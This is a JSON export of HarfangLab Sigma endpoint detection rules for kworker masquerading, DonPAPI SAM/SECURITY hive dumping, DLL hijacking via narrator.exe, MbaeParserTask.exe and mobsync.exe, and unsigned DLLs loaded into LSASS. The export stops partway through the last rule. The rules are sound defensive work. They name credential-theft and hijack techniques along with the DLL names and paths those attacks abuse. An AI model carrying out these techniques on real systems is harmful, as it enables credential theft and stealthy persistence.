"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611942Z",
"creation_date": "2026-03-23T11:45:34.611946Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611953Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html",
"https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_kworker_masquerading.yml",
"content": "title: Kworker Process Masqueraded\nid: ca8c50c9-be31-44c0-a2ca-c493faf68069\ndescription: |\n Detects processes that try to masquerade as the kworker system process.\n Kworker is a placeholder process for kernel worker threads which perform most of the actual processing for the Linux kernel.\n Adversaries may attempt to manipulate their process name to make it appear legitimate or benign to users.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html\n - https://sysdig.com/blog/unc5174-chinese-threat-actor-vshell/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/09/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n - ProcessProcessName|startswith: 'kworker/'\n Image|contains: '/'\n - ProcessCommandLine|startswith: '[kworker/'\n\n filter_parent:\n ProcessParentProcessName: 'kthreadd'\n ProcessGrandparentProcessName: 'kthreadd'\n\n exclusion_amazonlinux:\n AgentDistroid: 'amzn'\n ProcessImage:\n - '/usr/bin/kmod'\n - '/usr/lib/systemd/systemd-cgroups-agent'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ca8c50c9-be31-44c0-a2ca-c493faf68069",
"rule_name": "Kworker Process Masqueraded",
"rule_description": "Detects processes that try to masquerade as the kworker system process.\nKworker is a placeholder process for kernel worker threads which perform most of the actual processing for the Linux kernel.\nAdversaries may attempt to manipulate their process name to make it appear legitimate or benign to users.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-22",
"rule_modified_date": "2025-07-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "caa50242-5304-4ee7-8016-d72b99d151af",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627994Z",
"creation_date": "2026-03-23T11:45:34.627996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628000Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/login-securite/DonPAPI/blob/main/donpapi/lib/secretsdump.py#L780",
"https://www.synacktiv.com/en/publications/windows-secrets-extraction-a-summary",
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry",
"https://attack.mitre.org/techniques/T1003"
],
"name": "t1003_002_donpapi_sam_reg_save.yml",
"content": "title: SAM or SECURITY Hives Dumped from Registry via DonPAPI\nid: caa50242-5304-4ee7-8016-d72b99d151af\ndescription: |\n Detects a registry save-to-file operation of the SAM or SECURITY registry data with a specific file path characteristic of DonPAPI's secretsdump.py.\n The Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\n Tools like DonPAPI's secretsdump.py can export these hives to steal credentials or manipulate security settings.\n These operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\n It is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\nreferences:\n - https://github.com/login-securite/DonPAPI/blob/main/donpapi/lib/secretsdump.py#L780\n - https://www.synacktiv.com/en/publications/windows-secrets-extraction-a-summary\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-hashes-from-sam-registry\n - https://attack.mitre.org/techniques/T1003\ndate: 2024/07/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.DonPAPI\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SaveKey'\n TargetObject:\n - 'HKLM\\SECURITY'\n - 'HKLM\\SAM'\n ProcessImage: '?:\\Windows\\system32\\svchost.exe'\n HivePath:\n - '?:\\windows\\system32\\\\????????????.log'\n - '?:\\Windows\\Temp\\\\????????????.log'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "caa50242-5304-4ee7-8016-d72b99d151af",
"rule_name": "SAM or SECURITY Hives Dumped from Registry via DonPAPI",
"rule_description": "Detects a registry save-to-file operation of the SAM or SECURITY registry data with a specific file path characteristic of DonPAPI's secretsdump.py.\nThe Security Account Manager (SAM) and SECURITY registry hives in Microsoft Windows store sensitive user authentication and security policy information.\nTools like DonPAPI's secretsdump.py can export these hives to steal credentials or manipulate security settings.\nThese operations are a common tactic used by attackers to extract sensitive information that can be used for lateral movement or to further attacks.\nIt is recommended to verify the legitimacy of the export and check for unusual network connections and authentications to the target machine.\n",
"rule_creation_date": "2024-07-11",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cac0bdbb-27f5-4b46-8959-cfb19da1e1b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096602Z",
"creation_date": "2026-03-23T11:45:34.096604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096608Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_narrator.yml",
"content": "title: Phantom DLL Hijacking via narrator.exe\nid: cac0bdbb-27f5-4b46-8959-cfb19da1e1b3\ndescription: |\n Detects a potential Windows DLL search order hijacking via narrator.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/06\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Narrator.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded:\n - '?:\\Windows\\System32\\speech\\engines\\tts\\MSTTSLocEnUS.dll'\n - '?:\\windows\\system32\\speech_onecore\\engines\\tts\\msttsloc_onecoreenus.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cac0bdbb-27f5-4b46-8959-cfb19da1e1b3",
"rule_name": "Phantom DLL Hijacking via narrator.exe",
"rule_description": "Detects a potential Windows DLL search order hijacking via narrator.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cafbc4e6-a99d-4275-81ae-2359ded64f02",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077065Z",
"creation_date": "2026-03-23T11:45:34.077067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077072Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mbaeparsertask.yml",
"content": "title: DLL Hijacking via MbaeParserTask.exe\nid: cafbc4e6-a99d-4275-81ae-2359ded64f02\ndescription: |\n Detects potential Windows DLL Hijacking via MbaeParserTask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MbaeParserTask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mbaexmlparser.dll'\n - '\\mobilenetworking.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cafbc4e6-a99d-4275-81ae-2359ded64f02",
"rule_name": "DLL Hijacking via MbaeParserTask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MbaeParserTask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb0d8bac-26b6-47af-a786-f5b7f41feb1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599777Z",
"creation_date": "2026-03-23T11:45:34.599780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599788Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mobsync.yml",
"content": "title: DLL Hijacking via mobsync.exe\nid: cb0d8bac-26b6-47af-a786-f5b7f41feb1e\ndescription: |\n Detects potential Windows DLL Hijacking via mobsync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mobsync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\edputil.dll'\n - '\\PROPSYS.dll'\n - '\\shell32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb0d8bac-26b6-47af-a786-f5b7f41feb1e",
"rule_name": "DLL Hijacking via mobsync.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mobsync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb289a71-4836-4f9d-b12c-c0582903d497",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612804Z",
"creation_date": "2026-03-23T11:45:34.612808Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612815Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_loads_unsigned_dll.yml",
"content": "title: Unsigned DLL Loaded by LSASS\nid: cb289a71-4836-4f9d-b12c-c0582903d497\ndescription: |\n Detects when an unsigned DLL or EXE is loaded by the LSASS process.\n Attackers may try to load DLLs in LSASS as an attempt to dump credentials off the memory.\n This could also be a legitimate third party DLL addin features to the machine authentication mechanism.\n It is recommended to identify the unsigned DLL to determine its maliciousness and document legitimate third party DLLs.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2020/09/30\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n ImageLoaded|startswith: '?:\\'\n Signed: 'false'\n\n exclusion_winsxs:\n ImageLoaded:\n - '?:\\windows\\winsxs\\\\*\\mfc*.dll'\n - '?:\\windows\\winsxs\\\\*\\msv*.dll'\n exclusion_assembly:\n ImageLoaded: '?:\\Windows\\assembly\\NativeImages_*\\mscorlib.ni.dll'\n exclusion_ibm:\n ImageLoaded: '?:\\program files (x86)\\IBM\\Client Access\\\\*'\n exclusion_known_fp:\n ImageLoaded:\n - '?:\\windows\\system32\\firewallapi.dll' # d280021e4b245853d5e1df290ee894e4d4c1b0b735b536cadda3c4cb65b811f8\n - '?:\\windows\\system32\\fwbase.dll' # 395f68bfa50c2c233db8a7ef2badd51298526899d2e0e5ea7fb2e5e8617ab9b6\n - '?:\\windows\\system32\\peerdist.dll' # e8e2eebe93bfd031de6c9b792a09e97b226cdb46d8c6cbbae25da8965f77ff67\n exclusion_mdmregistration:\n # C:\\Windows\\System32\\mdmregistration.dll / 888281f120b95799998fe3f6ed1b475500113de0d36f10508e378646db6c01d7\n ImageLoaded: '?:\\Windows\\System32\\mdmregistration.dll'\n Description|contains: 'MDM Registration DLL'\n 
exclusion_SecureTimeAggregator:\n # C:\\Windows\\System32\\SecureTimeAggregator.dll / e76a202df9d6d75994d9b4d1dd07b077b1e33641aedbb7a4538c7f4383b5e030\n ImageLoaded: '?:\\Windows\\System32\\SecureTimeAggregator.dll'\n Description|contains: 'Secure Time Aggregator'\n exclusion_dpapi:\n # C:\\Windows\\System32\\dpapi.dll / e7df5bdea51d8f294ce24edb8631fca4a6ab9ed0925115d827148417267e234d\n ImageLoaded: '?:\\Windows\\System32\\dpapi.dll'\n Description|contains: 'Data Protection API'\n exclusion_ntdsapi:\n # C:\\Windows\\System32\\ntdsapi.dll / 4226b241ad2512d5e9daa101cbc693ed31d363b9f18a0fd247413a3c9ee3a4ba\n ImageLoaded: '?:\\Windows\\System32\\ntdsapi.dll'\n Description|contains: 'Active Directory Domain Services API'\n exclusion_vaultsvc:\n # c:\\windows\\system32\\vaultsvc.dll / a5f150c3aa29b70afb2741650cf35427c6cffe856cf104448803c697bd2f4df7\n ImageLoaded: '?:\\windows\\system32\\vaultsvc.dll'\n Description|contains: 'Credential Manager Service'\n exclusion_certpoleng:\n # c:\\windows\\system32\\CertPolEng.dll / 86eaa0a8dd22062a05bf0e88ed5e0b4718eea43b6fbaae72cac376bd2606eed1\n ImageLoaded: '?:\\windows\\system32\\CertPolEng.dll'\n Description|contains: 'Certificate Policy Engine'\n exclusion_cryptnet:\n # c:\\windows\\system32\\cryptnet.dll / b0ea497da38622462e3ed3b5c341839febab38142d6b4055bd4b292194024b2b\n ImageLoaded: '?:\\windows\\system32\\cryptnet.dll'\n Description|contains: 'Crypto Network Related API'\n exclusion_dhcpcsvc6:\n ImageLoaded: '?:\\Windows\\System32\\dhcpcsvc6.dll'\n Description: 'DHCPv6 Client'\n exclusion_peerdist:\n ImageLoaded: '?:\\Windows\\System32\\PeerDist.dll'\n Description: 'BranchCache Client Library'\n exclusion_ondemandconn:\n ImageLoaded: '?:\\Windows\\System32\\OnDemandConnRouteHelper.dll'\n Description: 'On Demand Connctiond Route Helper'\n exclusion_onecorecommon:\n ImageLoaded: '?:\\Windows\\System32\\OneCoreCommonProxyStub.dll'\n Description: 'OneCore Common Proxy Stub'\n exclusion_ngcpopkeysrv:\n ImageLoaded: 
'?:\\Windows\\System32\\ngcpopkeysrv.dll'\n Description: 'Microsoft Passport Proof-of-possession Key Service'\n exclusion_ibm_1:\n # c:\\Windows\\System32\\cwbunpls.dll / bd44f06770eab6f5fe89c22d1726fa5c787ea21faa080102b3ae7185a4795093\n # C:\\Windows\\System32\\cwbcore.dll / 7d7855761a4850e16cd202ea2a0e8e9610fbd6bdc6a6e6ef8de880b9cbb346cc\n ImageLoaded:\n - '?:\\Windows\\System32\\cwbunpls.dll'\n - '?:\\Windows\\System32\\cwbcore.dll'\n Company: 'IBM Corporation'\n exclusion_webio:\n # C:\\Windows\\System32\\webio.dll / e2a18218d1a641914284f8fd96740a48cfc89e5d69516e827f173b8f12f29758\n ImageLoaded: '?:\\Windows\\System32\\webio.dll'\n Description: 'Web Transfer Protocols API'\n exclusion_vaultcds:\n # C:\\Windows\\System32\\VaultCDS.dll / 9faf8160fb8b8bd01ffaddf96d1cd2f5199cf4de7a77b9e662dd9c02c8475309\n ImageLoaded: '?:\\Windows\\System32\\VaultCDS.dll'\n Description: 'Vault CDS'\n exclusion_efssvc:\n # c:\\Windows\\System32\\efssvc.dll / 2b96e1724e7783b7ac8f9c17f25d31735c75f6cb9c26e3e7d9a2493ea1952f8b\n ImageLoaded: '?:\\Windows\\System32\\efssvc.dll'\n Description: 'EFS Service'\n exclusion_mskeyprotect:\n ImageLoaded: '?:\\Windows\\System32\\mskeyprotect.dll'\n Description: 'Microsoft Key Protection Provider'\n exclusion_ncryptprov:\n ImageLoaded: '?:\\Windows\\System32\\ncryptprov.dll'\n Description: 'Microsoft KSP'\n exclusion_secur32:\n ImageLoaded: '?:\\Windows\\System32\\secur32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Security Support Provider Interface'\n exclusion_cloudstore:\n ImageLoaded: '?:\\Windows\\System32\\Windows.CloudStore.dll'\n Company: 'Microsoft Corporation'\n Description: 'Cloud Data Store'\n exclusion_cryptngc:\n ImageLoaded: '?:\\Windows\\System32\\cryptngc.dll'\n Company: 'Microsoft Corporation'\n Description: 'Microsoft Passport API'\n exclusion_mcafee:\n ImageLoaded: '?:\\Program Files\\McAfee\\Endpoint Encryption\\MfeCryptoAdapter64.dll'\n Company: 'McAfee, LLC'\n Description: 'McAfee Drive Encryption Cryptographic 
Adapter Module'\n exclusion_broadcom:\n ImageLoaded: '?:\\Windows\\System32\\BCMLogon.dll'\n Company:\n - 'Broadcom Corporation'\n - 'Dell Inc.'\n Description: 'Wireless Network Logon Provider'\n\n exclusion_chambersign:\n ImageLoaded:\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\idoCardModule.dll'\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\IAScs.dll'\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\idoCrypto.dll'\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\idoLog.dll'\n\n exclusion_smartcardmiddleware:\n ImageLoaded:\n - '?:\\Program Files\\Smart Card Middleware\\bin\\idoCrypto.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\IAS.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\MD.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\idoLog.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\idoCardModule.dll'\n\n exclusion_dsparse:\n ImageLoaded: '?:\\Windows\\System32\\dsparse.dll'\n Company: 'Microsoft Corporation'\n Description: 'Active Directory Domain Services API'\n\n exclusion_fwpuclnt:\n ImageLoaded: '?:\\Windows\\System32\\FWPUCLNT.DLL'\n Company: 'Microsoft Corporation'\n Description: 'FWP/IPsec User-Mode API'\n\n exclusion_rasadhlp:\n ImageLoaded: '?:\\Windows\\System32\\rasadhlp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Remote Access AutoDial Helper'\n\n exclusion_keyiso:\n ImageLoaded: '?:\\Windows\\System32\\keyiso.dll'\n Company: 'Microsoft Corporation'\n Description: 'CNG Key Isolation Service'\n\n exclusion_efsext:\n ImageLoaded: '?:\\Windows\\System32\\efsext.dll'\n Company: 'Microsoft Corporation'\n Description: 'EFSEXT.DLL'\n\n exclusion_novell:\n ImageLoaded:\n # SHA256: f82cd42cb1cc6d8ad7a3040b9035fb1cc1014d394831eaddb8fa17501c76084d\n - '?:\\Program Files\\Novell\\CASA\\Bin\\lcredmgr.dll'\n # SHA256: 56ff7f9823c005b06892f382a623e0f6c8fba69198294d3ea0c0cb8efc4d2aa0\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenCredManager.dll'\n\n exclusion_dhcpcsvc:\n # SHA256: 
